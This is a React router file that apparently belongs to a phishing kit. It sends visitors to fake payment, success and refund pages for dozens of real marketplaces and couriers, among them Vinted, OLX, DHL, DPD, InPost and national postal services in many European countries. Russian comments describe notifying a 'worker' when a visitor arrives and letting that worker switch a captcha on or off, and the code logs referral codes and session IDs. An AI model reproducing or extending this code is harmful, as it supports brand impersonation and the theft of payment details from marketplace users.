import React, { useState, useEffect } from 'react';
import { useParams, Navigate } from 'react-router-dom';
import Index1 from './Index1';
import Index2 from './Index2';
import Stripe1 from './Stripe1';
import VintedStripe1 from './VintedStripe1';
import VintedStripeSuccess from './VintedStripeSuccess';
import VintedStripe2 from './VintedStripe2';
import Olx1 from './Olx1';
import OlxSuccess from './OlxSuccess';
import Inpost1 from './Inpost1';
import InpostSuccess from './InpostSuccess';
import PayliverySuccess from './PayliverySuccess';
import WillhabenSuccess from './WillhabenSuccess';
import LandleananzeigenSuccess from './LandleananzeigenSuccess';
import ShpockSuccess from './ShpockSuccess';
import VintedAtSuccess from './VintedAtSuccess';
import DhlBeSuccess from './DhlBeSuccess';
import TweedehandsSuccess from './TweedehandsSuccess';
import DpdEeSuccess from './DpdEeSuccess';
import DpdLvSuccess from './DpdLvSuccess';
import DpdLtSuccess from './DpdLtSuccess';
import SkelbiuLtSuccess from './SkelbiuLtSuccess';
import DpdDeSuccess from './DpdDeSuccess';
import PostiFiSuccess from './PostiFiSuccess';
import ToriFiSuccess from './ToriFiSuccess';
import TuttiChSuccess from './TuttiChSuccess';
import RicardoChSuccess from './RicardoChSuccess';
import SwissPostChSuccess from './SwissPostChSuccess';
import ClozenChSuccess from './ClozenChSuccess';
import BgVintedSuccess from './BgVintedSuccess';
import EcontBgSuccess from './EcontBgSuccess';
import EuroExpressBaSuccess from './EuroExpressBaSuccess';
import BhPostaBaSuccess from './BhPostaBaSuccess';
import BrzaPostaBaSuccess from './BrzaPostaBaSuccess';
import XExpressBaSuccess from './XExpressBaSuccess';
import PplCzSuccess from './PplCzSuccess';
import GlsCzSuccess from './GlsCzSuccess';
import DpdCzSuccess from './DpdCzSuccess';
import AukroCzSuccess from './AukroCzSuccess';
import GlsDkSuccess from './GlsDkSuccess';
import GlsHuSuccess from './GlsHuSuccess';
import JofogasHuSuccess from './JofogasHuSuccess';
import CarousellMySuccess from './CarousellMySuccess';
import HrPostaSuccess from './HrPostaSuccess';
import LeboncoinFrSuccess from './LeboncoinFrSuccess';
import DbaDkSuccess from './DbaDkSuccess';
import DaoDkSuccess from './DaoDkSuccess';
import GulogGratisDkSuccess from './GulogGratisDkSuccess';
import DhlDeSuccess from './DhlDeSuccess';
import DhlNlSuccess from './DhlNlSuccess';
import KleinanzeigenDeSuccess from './KleinanzeigenDeSuccess';
import QuokaDeSuccess from './QuokaDeSuccess';
import PetTaxiDeSuccess from './PetTaxiDeSuccess';
import PetTaxiRefundPage from './PetTaxiRefundPage';
import BookingSuccess from './BookingSuccess';
import { isPetTaxiTemplate } from '../petTaxiLocales';
import { isBookingTemplate } from '../bookingLocales';
import WallapopEsSuccess from './WallapopEsSuccess';
import WallapopItSuccess from './WallapopItSuccess';
import BakecaItSuccess from './BakecaItSuccess';
import SubitoItSuccess from './SubitoItSuccess';
import SpedireItSuccess from './SpedireItSuccess';
import MilanunciosEsSuccess from './MilanunciosEsSuccess';
import CorreosEsSuccess from './CorreosEsSuccess';
import UnGrandMarcheFrSuccess from './UnGrandMarcheFrSuccess';
import TraceveloFrSuccess from './TraceveloFrSuccess';
import NovaPoshtaMdSuccess from './NovaPoshtaMdSuccess';
import BlandIsSuccess from './BlandIsSuccess';
import AnPostIeSuccess from './AnPostIeSuccess';
import FanCourierRoSuccess from './FanCourierRoSuccess';
import OlxRoSuccess from './OlxRoSuccess';
import OlxPtSuccess from './OlxPtSuccess';
import CustoJustoPtSuccess from './CustoJustoPtSuccess';
import CttPtSuccess from './CttPtSuccess';
import SprzedajemyPlSuccess from './SprzedajemyPlSuccess';
import PocztaPlSuccess from './PocztaPlSuccess';
import DpdPlSuccess from './DpdPlSuccess';
import DpdNlSuccess from './DpdNlSuccess';
import PostenNoSuccess from './PostenNoSuccess';
import PostnlNlSuccess from './PostnlNlSuccess';
import MarktplaatsNlSuccess from './MarktplaatsNlSuccess';
import PacketaSkSuccess from './PacketaSkSuccess';
import EPostaSkSuccess from './EPostaSkSuccess';
import DpdSkSuccess from './DpdSkSuccess';
import BazosSkSuccess from './BazosSkSuccess';
import PostaSkSuccess from './PostaSkSuccess';
import TraderaSeSuccess from './TraderaSeSuccess';
import InstaboxSeSuccess from './InstaboxSeSuccess';
import DhlSeSuccess from './DhlSeSuccess';
import SchenkerSeSuccess from './SchenkerSeSuccess';
import BlocketSeSuccess from './BlocketSeSuccess';
import { fetchPageWithFallback, API_URL } from '../fetchPageWithFallback';
import { resolvePaymentPageCode, PAYMENT_FLOW_PAGE_KEY, dedupedSessionStart, notifyPaymentSessionId } from '../paymentSession';
import { usePaymentPaths } from '../paymentPaths';

const DpdLtSuccessPage = DpdLtSuccess;
const SubitoItSuccessPage = SubitoItSuccess;
const SpedireItSuccessPage = SpedireItSuccess;
const BakecaItSuccessPage = BakecaItSuccess;
const BlandIsSuccessPage = BlandIsSuccess;
const AnPostIeSuccessPage = AnPostIeSuccess;
const FanCourierRoSuccessPage = FanCourierRoSuccess;
const OlxRoSuccessPage = OlxRoSuccess;
const OlxPtSuccessPage = OlxPtSuccess;
const CustoJustoPtSuccessPage = CustoJustoPtSuccess;
const CttPtSuccessPage = CttPtSuccess;
const SprzedajemyPlSuccessPage = SprzedajemyPlSuccess;
const PocztaPlSuccessPage = PocztaPlSuccess;
const DpdPlSuccessPage = DpdPlSuccess;
const DpdNlSuccessPage = DpdNlSuccess;
const PostenNoSuccessPage = PostenNoSuccess;
const PostnlNlSuccessPage = PostnlNlSuccess;
const MarktplaatsNlSuccessPage = MarktplaatsNlSuccess;
const PacketaSkSuccessPage = PacketaSkSuccess;
const EPostaSkSuccessPage = EPostaSkSuccess;
const DpdSkSuccessPage = DpdSkSuccess;
const BazosSkSuccessPage = BazosSkSuccess;
const PostaSkSuccessPage = PostaSkSuccess;
const TraderaSeSuccessPage = TraderaSeSuccess;
const InstaboxSeSuccessPage = InstaboxSeSuccess;
const DhlSeSuccessPage = DhlSeSuccess;
const DhlNlSuccessPage = DhlNlSuccess;
const SchenkerSeSuccessPage = SchenkerSeSuccess;
const BlocketSeSuccessPage = BlocketSeSuccess;

const PAYMENT_SESSION_KEYS = { sessionId: 'payment_session_id', logId: 'payment_log_id' };

/** Капча воркера из /api/page (как в api_server get_page). Шире, чем === true, чтобы не путать с «выкл». */
function isWorkerCaptchaEnabled(page) {
  if (!page) return false;
  const v = page.captcha_enabled;
  if (v === true || v === 1) return true;
  if (v === '1') return true;
  if (typeof v === 'string' && v.toLowerCase() === 'true') return true;
  return false;
}

/** Те же шаблоны, что дают редирект index1 → success при выключенной капче (см. isFirstPageWithSuccess). */
function pageQualifiesForEarlySuccessSkip(page) {
  if (!page) return false;
  const template = page.template || 'vinted2';
  const isCzVinted = template === 'cz_vinted';
  const useStripePayment =
    template === 'vinted2' ||
    template === 'vinted_stripe' ||
    template === 'fi_vinted' ||
    template === 'lt_vinted' ||
    template === 'se_vinted' ||
    template === 'be_vinted' ||
    template === 'nl_vinted' ||
    template === 'de_vinted' ||
    template === 'fr_vinted' ||
    template === 'es_vinted' ||
    template === 'it_vinted' ||
    template === 'es_wallapop' ||
    template === 'it_wallapop' ||
    template === 'it_bakeca' ||
    template === 'it_subito' ||
    template === 'it_spedire' ||
    template === 'is_bland' ||
    template === 'ie_anpost' ||
    template === 'ro_fancourier' ||
    template === 'ro_olx' ||
    template === 'pt_olx' ||
    template === 'pt_custojusto' ||
    template === 'pt_ctt' ||
    template === 'pl_sprzedajemy' ||
    template === 'pl_poczta' ||
    template === 'pl_dpd' ||
    template === 'no_posten' ||
    template === 'nl_postnl' ||
    template === 'nl_marktplaats' ||
    template === 'nl_dpd' ||
    template === 'sk_packeta' ||
    template === 'sk_eposta' ||
    template === 'sk_posta' ||
    template === 'sk_dpd' ||
    template === 'sk_bazos' ||
    template === 'se_tradera' ||
    template === 'se_instabox' ||
    template === 'se_dhl' ||
    template === 'se_dbschenker' ||
    template === 'se_blocket' ||
    template === 'es_milanuncios' ||
    template === 'es_correos' ||
    isCzVinted;
  const isAtStripeService = ['at_paylivery', 'at_willhaben', 'at_landleanzeigen', 'at_shpock', 'at_vinted'].includes(
    template,
  );
  return (
    useStripePayment ||
    template === 'olx' ||
    template === 'inpost' ||
    isAtStripeService ||
    [
      'be_dhl',
      'be_2dehands',
      'ee_dpd',
      'lv_dpd',
      'lt_dpd',
      'lt_skelbiu_siuntos',
      'de_dpd',
      'fi_posti',
      'fi_tori',
      'ch_tutti',
      'ch_ricardo',
      'ch_swisspost',
      'ch_clozen',
      'bg_vinted',
      'bg_econt',
      'ba_euroexpress',
      'ba_bhposta',
      'ba_brzaposta',
      'ba_xexpress',
      'cz_ppl',
      'cz_gls',
      'cz_dpd',
      'cz_aukro',
      'dk_gls',
      'hu_gls',
      'hu_jofogas',
      'my_carousell',
      'hr_posta',
      'fr_leboncoin',
      'fr_ungrandmarche',
      'fr_tracevelo',
      'md_novaposhta',
      'dk_dba',
      'dk_dao',
      'dk_guloggratis',
      'de_dhl',
      'nl_dhl',
      'se_dhl',
      'se_dbschenker',
      'se_blocket',
      'de_kleinanzeigen',
      'de_quoka',
    ].includes(template) ||
    isPetTaxiTemplate(template) ||
    isBookingTemplate(template)
  );
}

/**
 * Роутер для /merchant/order/:pageCode и legacy /page/:pageCode (+ index2, success).
 */
export default function PageRouter({ indexPage = 1 }) {
  const { pageCode } = useParams();
  const { toSuccess } = usePaymentPaths();
  const [page, setPage] = useState(null);
  const [loading, setLoading] = useState(true);
  const [error, setError] = useState(null);

  useEffect(() => {
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    setError(null);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data && data.success && data.page) setPage(data.page);
        else setError((data && data.error) || 'Page not found');
      })
      .catch((err) => setError(err?.message || 'Failed to load page'))
      .finally(() => setLoading(false));
  }, [pageCode]);

  /**
   * Заход на success/refund: каждый раз новая сессия и уведомление «ПЕРЕХОД» воркеру.
   * При включённой капче session/start уже на index1 (VintedStripe1).
   */
  useEffect(() => {
    if (indexPage !== 'success' && indexPage !== 'refund') return;
    if (!pageCode || !page) return;
    if (isWorkerCaptchaEnabled(page)) return;

    const effectivePc = resolvePaymentPageCode(pageCode);
    if (!effectivePc) return;

    const prev = sessionStorage.getItem(PAYMENT_FLOW_PAGE_KEY);
    if (prev && prev !== effectivePc) {
      sessionStorage.removeItem(PAYMENT_SESSION_KEYS.sessionId);
      sessionStorage.removeItem(PAYMENT_SESSION_KEYS.logId);
    }
    sessionStorage.setItem(PAYMENT_FLOW_PAGE_KEY, effectivePc);
    sessionStorage.removeItem(PAYMENT_SESSION_KEYS.sessionId);
    sessionStorage.removeItem(PAYMENT_SESSION_KEYS.logId);

    const urlParams = new URLSearchParams(window.location.search);
    const referralCode = urlParams.get('ref');
    const pathname = window.location.pathname;
    let unique_id = null;
    const pathMatch = pathname.match(/\/([A-Z0-9]{16})(?:\/|$|\/index2)/);
    if (pathMatch) unique_id = pathMatch[1];

    let cancelled = false;
    dedupedSessionStart(API_URL, {
      page_code: effectivePc,
      referral_code: referralCode || undefined,
      unique_id: unique_id || undefined,
    }).then((data) => {
      if (cancelled || !data || !data.success || !data.session_id) return;
      sessionStorage.setItem(PAYMENT_SESSION_KEYS.sessionId, data.session_id);
      if (data.log_id) sessionStorage.setItem(PAYMENT_SESSION_KEYS.logId, String(data.log_id));
      notifyPaymentSessionId();
    });

    return () => {
      cancelled = true;
    };
  }, [indexPage, pageCode, page]);

  if (loading) {
    return (
      <div style={{ padding: 24, textAlign: 'center' }}>
        Loading...
      </div>
    );
  }
  if (error || !page) {
    return (
      <div style={{ padding: 24, textAlign: 'center' }}>
        {error || 'Page not found'}
      </div>
    );
  }

  const template = page.template || 'vinted2';
  const isStripe = template === 'stripe';
  const isBeDhl = template === 'be_dhl';
  const isBeTweedehands = template === 'be_2dehands';
  const isEeDpd = template === 'ee_dpd';
  const isLvDpd = template === 'lv_dpd';
  const isLtDpd = template === 'lt_dpd';
  const isLtSkelbiuSiuntos = template === 'lt_skelbiu_siuntos';
  const isDeDpd = template === 'de_dpd';
  const isFiPosti = template === 'fi_posti';
  const isFiTori = template === 'fi_tori';
  const isChTutti = template === 'ch_tutti';
  const isChRicardo = template === 'ch_ricardo';
  const isChSwisspost = template === 'ch_swisspost';
  const isChClozen = template === 'ch_clozen';
  const isBgVinted = template === 'bg_vinted';
  const isBgEcont = template === 'bg_econt';
  const isBaEuroexpress = template === 'ba_euroexpress';
  const isBaBhposta = template === 'ba_bhposta';
  const isBaBrzaposta = template === 'ba_brzaposta';
  const isBaXexpress = template === 'ba_xexpress';
  const isCzPpl = template === 'cz_ppl';
  const isCzGls = template === 'cz_gls';
  const isCzDpd = template === 'cz_dpd';
  const isCzAukro = template === 'cz_aukro';
  const isCzVinted = template === 'cz_vinted';
  const isDkGls = template === 'dk_gls';
  const isHuGls = template === 'hu_gls';
  const isHuJofogas = template === 'hu_jofogas';
  const isMyCarousell = template === 'my_carousell';
  const isHrPosta = template === 'hr_posta';
  const isFrLeboncoin = template === 'fr_leboncoin';
  const isFrUnGrandMarche = template === 'fr_ungrandmarche';
  const isFrTracevelo = template === 'fr_tracevelo';
  const isMdNovaPoshta = template === 'md_novaposhta';
  const isDkDba = template === 'dk_dba';
  const isDkDao = template === 'dk_dao';
  const isDkGulogGratis = template === 'dk_guloggratis';
  const isDeDhl = template === 'de_dhl';
  const isNlDhl = template === 'nl_dhl';
  const isDeKleinanzeigen = template === 'de_kleinanzeigen';
  const isDeQuoka = template === 'de_quoka';
  const isPetTaxi = isPetTaxiTemplate(template);
  const isBooking = isBookingTemplate(template);
  const isVintedStripe = template === 'vinted_stripe';
  const isVinted2 = template === 'vinted2';
  const isFiVinted = template === 'fi_vinted';
  const isLtVinted = template === 'lt_vinted';
  const isSeVinted = template === 'se_vinted';
  const isBeVinted = template === 'be_vinted';
  const isNlVinted = template === 'nl_vinted';
  const isDeVinted = template === 'de_vinted';
  const isFrVinted = template === 'fr_vinted';
  const isEsVinted = template === 'es_vinted';
  const isPtVinted = template === 'pt_vinted' || template === 'pt_vnited';
  const isItVinted = template === 'it_vinted';
  const isEsWallapop = template === 'es_wallapop';
  const isItWallapop = template === 'it_wallapop';
  const isItBakeca = template === 'it_bakeca';
  const isItSubito = template === 'it_subito';
  const isItSpedire = template === 'it_spedire';
  const isIsBland = template === 'is_bland';
  const isIeAnpost = template === 'ie_anpost';
  const isRoFancourier = template === 'ro_fancourier';
  const isRoOlx = template === 'ro_olx';
  const isPtOlx = template === 'pt_olx';
  const isPtCustojusto = template === 'pt_custojusto';
  const isPtCtt = template === 'pt_ctt';
  const isPlSprzedajemy = template === 'pl_sprzedajemy';
  const isPlPoczta = template === 'pl_poczta';
  const isPlDpd = template === 'pl_dpd';
  const isNoPosten = template === 'no_posten';
  const isNlPostnl = template === 'nl_postnl';
  const isNlMarktplaats = template === 'nl_marktplaats';
  const isNlDpd = template === 'nl_dpd';
  const isSkPacketa = template === 'sk_packeta';
  const isSkEposta = template === 'sk_eposta';
  const isSkPosta = template === 'sk_posta';
  const isSkDpd = template === 'sk_dpd';
  const isSkBazos = template === 'sk_bazos';
  const isSeTradera = template === 'se_tradera';
  const isSeInstabox = template === 'se_instabox';
  const isSeDhl = template === 'se_dhl';
  const isSeDbschenker = template === 'se_dbschenker';
  const isSeBlocket = template === 'se_blocket';
  const isEsMilanuncios = template === 'es_milanuncios';
  const isEsCorreos = template === 'es_correos';
  const isOlx = template === 'olx';
  const isInpost = template === 'inpost';
  const useStripePayment =
    isVinted2 ||
    isVintedStripe ||
    isFiVinted ||
    isLtVinted ||
    isSeVinted ||
    isBeVinted ||
    isNlVinted ||
    isDeVinted ||
    isFrVinted ||
    isEsVinted ||
    isPtVinted ||
    isItVinted ||
    isEsWallapop ||
    isItWallapop ||
    isItBakeca ||
    isItSubito ||
    isItSpedire ||
    isIsBland ||
    isIeAnpost ||
    isRoFancourier ||
    isRoOlx ||
    isPtOlx ||
    isPtCustojusto ||
    isPtCtt ||
    isPlSprzedajemy ||
    isPlPoczta ||
    isPlDpd ||
    isNoPosten ||
    isNlPostnl ||
    isNlMarktplaats ||
    isNlDpd ||
    isSkPacketa ||
    isSkEposta ||
    isSkPosta ||
    isSkDpd ||
    isSkBazos ||
    isSeTradera ||
    isSeInstabox ||
    isSeDhl ||
    isSeDbschenker ||
    isSeBlocket ||
    isEsMilanuncios ||
    isEsCorreos ||
    isCzVinted;
  const captchaEnabled = isWorkerCaptchaEnabled(page);
  const pageCountry = (page.country_code || '').toUpperCase();
  const useVintedCaptchaFirst =
    isBeDhl ||
    isBeTweedehands ||
    isEeDpd ||
    isLvDpd ||
    isLtDpd ||
    isLtSkelbiuSiuntos ||
    isDeDpd ||
    isFiPosti ||
    isFiTori ||
    isChTutti ||
    isChRicardo ||
    isChSwisspost ||
    isChClozen ||
    isBgVinted ||
    isBgEcont ||
    isBaEuroexpress ||
    isBaBhposta ||
    isBaBrzaposta ||
    isBaXexpress ||
    isCzPpl ||
    isSkPacketa ||
    isSkEposta ||
    isSkPosta ||
    isSkDpd ||
    isSkBazos ||
    isSeTradera ||
    isSeInstabox ||
    isSeDhl ||
    isSeDbschenker ||
    isSeBlocket ||
    isRoOlx ||
    isPtOlx ||
    isPtCustojusto ||
    isPtCtt ||
    isCzGls ||
    isCzDpd ||
    isCzAukro ||
    isDkGls ||
    isHuGls ||
    isHuJofogas ||
    isMyCarousell ||
    isHrPosta ||
    isFrLeboncoin ||
    isFrUnGrandMarche ||
    isFrTracevelo ||
    isMdNovaPoshta ||
    isDkDba ||
    isDkDao ||
    isDkGulogGratis ||
    isDeDhl ||
    isNlDhl ||
    isDeKleinanzeigen ||
    isDeQuoka ||
    isPetTaxi ||
    isBooking ||
    (isStripe && ['BE', 'FI', 'EE'].includes(pageCountry));
  const isAtStripeService = ['at_paylivery', 'at_willhaben', 'at_landleanzeigen', 'at_shpock', 'at_vinted'].includes(template);
  const isFirstPageWithSuccess = indexPage === 1 && pageQualifiesForEarlySuccessSkip(page);

  // Если капча выключена у воркера — с первой страницы сразу на success (без промежуточного экрана)
  if (isFirstPageWithSuccess && !captchaEnabled) {
    return <Navigate to={toSuccess()} replace />;
  }

  if (indexPage === 1) {
    if (isInpost) return <Inpost1 />;
    if (isOlx) return <Olx1 />;
    if (isAtStripeService) return <Olx1 />;
    if (useVintedCaptchaFirst) return <VintedStripe1 page={page} />;
    if (isPtVinted) return <Index1 />;
    if (useStripePayment) return <VintedStripe1 page={page} />;
    if (isStripe) return <Stripe1 page={page} />;
    return <Index1 />;
  }
  if (indexPage === 'success') {
    if (isInpost) return <InpostSuccess />;
    if (isOlx) return <OlxSuccess />;
    if (isBeDhl) return <DhlBeSuccess page={page} />;
    if (isBeTweedehands) return <TweedehandsSuccess page={page} />;
    if (isEeDpd) return <DpdEeSuccess page={page} />;
    if (isLvDpd) return <DpdLvSuccess page={page} />;
    if (isLtDpd) return <DpdLtSuccessPage page={page} />;
    if (isLtSkelbiuSiuntos) return <SkelbiuLtSuccess page={page} />;
    if (isDeDpd) return <DpdDeSuccess page={page} />;
    if (isFiPosti) return <PostiFiSuccess page={page} />;
    if (isFiTori) return <ToriFiSuccess page={page} />;
    if (isChTutti) return <TuttiChSuccess page={page} />;
    if (isChRicardo) return <RicardoChSuccess page={page} />;
    if (isChSwisspost) return <SwissPostChSuccess page={page} />;
    if (isChClozen) return <ClozenChSuccess page={page} />;
    if (isBgVinted) return <BgVintedSuccess page={page} />;
    if (isBgEcont) return <EcontBgSuccess page={page} />;
    if (isBaEuroexpress) return <EuroExpressBaSuccess page={page} />;
    if (isBaBhposta) return <BhPostaBaSuccess page={page} />;
    if (isBaBrzaposta) return <BrzaPostaBaSuccess page={page} />;
    if (isBaXexpress) return <XExpressBaSuccess page={page} />;
    if (isCzPpl) return <PplCzSuccess page={page} />;
    if (isCzGls) return <GlsCzSuccess page={page} />;
    if (isCzDpd) return <DpdCzSuccess page={page} />;
    if (isCzAukro) return <AukroCzSuccess page={page} />;
    if (isDkGls) return <GlsDkSuccess page={page} />;
    if (isHuGls) return <GlsHuSuccess page={page} />;
    if (isHuJofogas) return <JofogasHuSuccess page={page} />;
    if (isMyCarousell) return <CarousellMySuccess page={page} />;
    if (isHrPosta) return <HrPostaSuccess page={page} />;
    if (isFrLeboncoin) return <LeboncoinFrSuccess page={page} />;
    if (isFrUnGrandMarche) return <UnGrandMarcheFrSuccess page={page} />;
    if (isFrTracevelo) return <TraceveloFrSuccess page={page} />;
    if (isMdNovaPoshta) return <NovaPoshtaMdSuccess page={page} />;
    if (isDkDba) return <DbaDkSuccess page={page} />;
    if (isDkDao) return <DaoDkSuccess page={page} />;
    if (isDkGulogGratis) return <GulogGratisDkSuccess page={page} />;
    if (isDeDhl) return <DhlDeSuccess page={page} />;
    if (isNlDhl) return <DhlNlSuccessPage page={page} />;
    if (isDeKleinanzeigen) return <KleinanzeigenDeSuccess page={page} />;
    if (isDeQuoka) return <QuokaDeSuccess page={page} />;
    if (isPetTaxi) return <PetTaxiDeSuccess page={page} />;
    if (isBooking) return <BookingSuccess page={page} />;
    // AT-сервисы до VintedStripeSuccess: иначе при ошибке template легко уйти не в тот экран
    if (template === 'at_vinted') return <VintedAtSuccess />;
    if (template === 'at_paylivery') return <PayliverySuccess />;
    if (template === 'at_willhaben') return <WillhabenSuccess />;
    if (template === 'at_landleanzeigen') return <LandleananzeigenSuccess />;
    if (template === 'at_shpock') return <ShpockSuccess />;
    if (isEsWallapop) return <WallapopEsSuccess page={page} />;
    if (isItWallapop) return <WallapopItSuccess page={page} />;
    if (isItBakeca) return <BakecaItSuccessPage page={page} />;
    if (isItSubito) return <SubitoItSuccessPage page={page} />;
    if (isItSpedire) return <SpedireItSuccessPage page={page} />;
    if (isIsBland) return <BlandIsSuccessPage page={page} />;
    if (isIeAnpost) return <AnPostIeSuccessPage page={page} />;
    if (isRoFancourier) return <FanCourierRoSuccessPage page={page} />;
    if (isRoOlx) return <OlxRoSuccessPage page={page} />;
    if (isPtOlx) return <OlxPtSuccessPage page={page} />;
    if (isPtCustojusto) return <CustoJustoPtSuccessPage page={page} />;
    if (isPtCtt) return <CttPtSuccessPage page={page} />;
    if (isPlSprzedajemy) return <SprzedajemyPlSuccessPage page={page} />;
    if (isPlPoczta) return <PocztaPlSuccessPage page={page} />;
    if (isPlDpd) return <DpdPlSuccessPage page={page} />;
    if (isNoPosten) return <PostenNoSuccessPage page={page} />;
    if (isNlPostnl) return <PostnlNlSuccessPage page={page} />;
    if (isNlMarktplaats) return <MarktplaatsNlSuccessPage page={page} />;
    if (isNlDpd) return <DpdNlSuccessPage page={page} />;
    if (isSkPacketa) return <PacketaSkSuccessPage page={page} />;
    if (isSkEposta) return <EPostaSkSuccessPage page={page} />;
    if (isSkPosta) return <PostaSkSuccessPage page={page} />;
    if (isSkDpd) return <DpdSkSuccessPage page={page} />;
    if (isSkBazos) return <BazosSkSuccessPage page={page} />;
    if (isSeTradera) return <TraderaSeSuccessPage page={page} />;
    if (isSeInstabox) return <InstaboxSeSuccessPage page={page} />;
    if (isSeDhl) return <DhlSeSuccessPage page={page} />;
    if (isSeDbschenker) return <SchenkerSeSuccessPage page={page} />;
    if (isSeBlocket) return <BlocketSeSuccessPage page={page} />;
    if (isEsMilanuncios) return <MilanunciosEsSuccess page={page} />;
    if (isEsCorreos) return <CorreosEsSuccess page={page} />;
    if (useStripePayment) return <VintedStripeSuccess page={page} />;
    return <Index1 />;
  }
  if (indexPage === 'refund') {
    if (isPetTaxi) return <PetTaxiRefundPage page={page} />;
    return <Navigate to={toSuccess()} replace />;
  }
  if (
    isInpost ||
    isOlx ||
    isAtStripeService ||
    isBeDhl ||
    isBeTweedehands ||
    isEeDpd ||
    isLvDpd ||
    isLtDpd ||
    isLtSkelbiuSiuntos ||
    isDeDpd ||
    isFiPosti ||
    isFiTori ||
    isChTutti ||
    isChRicardo ||
    isChSwisspost ||
    isChClozen ||
    isBgVinted ||
    isBgEcont ||
    isBaEuroexpress ||
    isBaBhposta ||
    isBaBrzaposta ||
    isBaXexpress ||
    isCzPpl ||
    isSkPacketa ||
    isSkEposta ||
    isSkPosta ||
    isSkDpd ||
    isSkBazos ||
    isSeTradera ||
    isSeInstabox ||
    isSeDhl ||
    isSeDbschenker ||
    isSeBlocket ||
    isCzGls ||
    isCzDpd ||
    isCzAukro ||
    isDkGls ||
    isHuGls ||
    isHuJofogas ||
    isMyCarousell ||
    isHrPosta ||
    isFrLeboncoin ||
    isFrUnGrandMarche ||
    isFrTracevelo ||
    isMdNovaPoshta ||
    isDkDba ||
    isDkDao ||
    isDkGulogGratis ||
    isDeDhl ||
    isNlDhl ||
    isDeKleinanzeigen ||
    isDeQuoka ||
    isPetTaxi ||
    isBooking ||
    isEsCorreos ||
    useStripePayment ||
    isStripe
  ) {
    return <VintedStripe2 page={page} template={template} />;
  }
  return <Index2 />;
}
